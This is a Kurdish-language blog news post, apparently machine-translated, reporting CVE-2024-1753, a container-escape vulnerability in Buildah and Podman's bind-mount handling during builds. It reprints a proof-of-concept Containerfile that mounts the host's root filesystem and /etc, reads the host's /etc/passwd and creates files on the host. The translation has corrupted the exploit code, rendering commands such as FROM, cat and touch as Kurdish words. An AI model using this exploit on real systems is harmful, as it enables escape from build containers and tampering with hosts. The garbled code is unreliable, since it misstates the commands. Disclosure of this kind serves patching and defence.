ProHoster > Blog > nûçeyên înternetê > Li Buildah û Podman îzolasyona konteyneran xerabûna derbas dike

Li Buildah û Podman îzolasyona konteyneran xerabûna derbas dike

Di pakêtên Buildah û Podman de qelsiyek (CVE-2024-1753) hatiye tespîtkirin, ku di qonaxa avakirina konteynerê de ku bi mafên root dixebite, gihîştina tevahî ya pergala pelan a jîngeha mêvandar dihêle. Li ser pergalên ku SE çalak e.Linux Gihîştina pergala pelê mêvandar bi moda tenê xwendinê ve sînorkirî ye. Çareserkirin niha wekî patchek heye, ku vê dawiyê di koda Buildah de hate pejirandin.

Zelalbûn ji ber vê yekê ye ku dema ku perçeyên pergala pelan bi karanîna fermana "mount —bind" di dema çêkirinê de di qonaxa RUN de bi kar tîne, argumana bi pelrêça çavkaniyê (parametra "çavkanî =") nayê kontrol kirin ku were dîtin. heke ew di pergala pelê root de hebe. Pelê veavakirina Containerfile ku ji hêla êrîşker ve hatî çêkirin dikare wêneyek konteynerê bikar bîne ku tê de pelrêça çîyayê çavkanî wekî girêdanek sembolîk ji pergala pelê root re tê format kirin. Di vê rewşê de, operasyona mountê dê bibe sedema çekirina pergala pelê root ya hawîrdora mêvandar di hundurê konteynerê de, ku dê di qonaxa RUN de bihêle ku bi tevahî bigihîje pergala pelê ya hawîrdora mêvandar û derketina ji konteynerê di dema konteynerê de organîze bike. bi karanîna fermanên "buildah build" an "podman build" ava bikin.

Nimûneyek peldankek xirabkar, ku bi fermana "podman build -f ~/Containerfile" hatiye çêkirin. dê naveroka /etc/passwd nîşan bide û pelên /BIND_BREAKEOUT û /etc/BIND_BREAKOUT2 li hawîrdora mêvandar biafirîne: FROM alpine wekî bingeh RUN ln -s / /rootdir RUN ln -s /etc /etc2 JI alpine RUN echo “ls root konteynir " RUN ls -l / RUN echo "Bi îstîsmarê re rootê mêvandar nîşan bide, ne koka konteynerê, û /BIND_BREAKOUT li / li ser mêvandar biafirîne" RUN —mount=type=bind,from=base,source=/rootdir,destination =/ exploit,rw ls -l /exploit; bi /exploit/BIND_BREAKOUT; ls -l /exploit RUN echo "Bi ekploit nîşan bide mêvandarê /etc/passwd, ne ya konteynerê, û /BIND_BREAKOUT2 di /etc de li ser mêvandar biafirîne" RUN —mount=type=bind,rw,source=/etc2,destination=/ etc2,from=base ls -l /; ls -l /etc2/passwd; pisîk /etc2/passwd; dest /etc2/BIND_BREAKOUT2; ls -l /etc2

Source: opennet.ru

Ji bo malperên bi parastina DDoS, serverên VPS VDS mêvandariya pêbawer bikirin 🔥 Hostinga malperê ya pêbawer bi parastina DDoS, serverên VPS VDS bikirin | ProHoster